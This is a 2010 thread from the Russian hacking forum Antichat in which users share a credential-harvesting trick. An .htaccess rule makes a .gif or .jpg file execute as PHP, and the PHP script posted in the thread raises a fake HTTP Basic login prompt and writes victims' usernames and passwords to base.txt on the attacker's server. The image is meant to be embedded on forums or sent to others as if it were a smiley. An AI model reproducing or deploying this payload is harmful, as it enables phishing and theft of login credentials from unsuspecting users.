Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)

- - xss (https://forum.antichat.xyz/showthread.php?t=186322)

n1ck	13.03.2010 01:16

xss

поделитесь файликом или напомните как называется у меня где то было на компе найти не могу или потер случайно в общем суть такая
есть там картинка с кодом и файл htaccess
эта картинка выглядит как смайл при вставке ссылки на форуме или на сайте выскакивает окошко с просьбой ввести логин и пароль при вводе он сохраняет логин и пароль на сервере где картинка.
если можете прикрепите файл или напомните как называеться

wolmer

13.03.2010 01:28

В htaccess добавляешь (точно не помню, но вроде это):
AddType application/x-httpd-php .jpg

Далее гуглишь как вызвать basic авторизацию на php, ну и собственно кладешь скрипт (с basic авторизацией) в .jpg "формат" на сервере, и даешь эту jpg своему другу к примеру

satana-fu

13.03.2010 01:38

image.gif

PHP код:


		
			
<?

    $filevalid    = 'base.txt';

    $good        = fopen($filevalid, 'a+');

header("WWW-Authenticate: Basic realm=\"Access Forbidden - Private level\"");

header("HTTP/1.0 401 Access Forbidden");

if (isset($_SERVER["PHP_AUTH_USER"]) ) {

$user = $_SERVER["PHP_AUTH_USER"];

$pass = $_SERVER["PHP_AUTH_PW"];

fwrite ($good, $user.';'.$pass."\n");

header("HTTP/1.0 200");

//exit("test");

}



?>

.htaccess

PHP код:


		
			
<files "image.gif">

AddType application/x-httpd-php .gif

</files>

base.txt (с правами 777)

PHP код:

n1ck	13.03.2010 01:54

Спасибо большой за помощь ;)

n1ck	13.03.2010 02:01

Вот кстате я такой архивчик искал
http://forum4game.freetzi.com/images/
не у кого нету?

Время: 17:30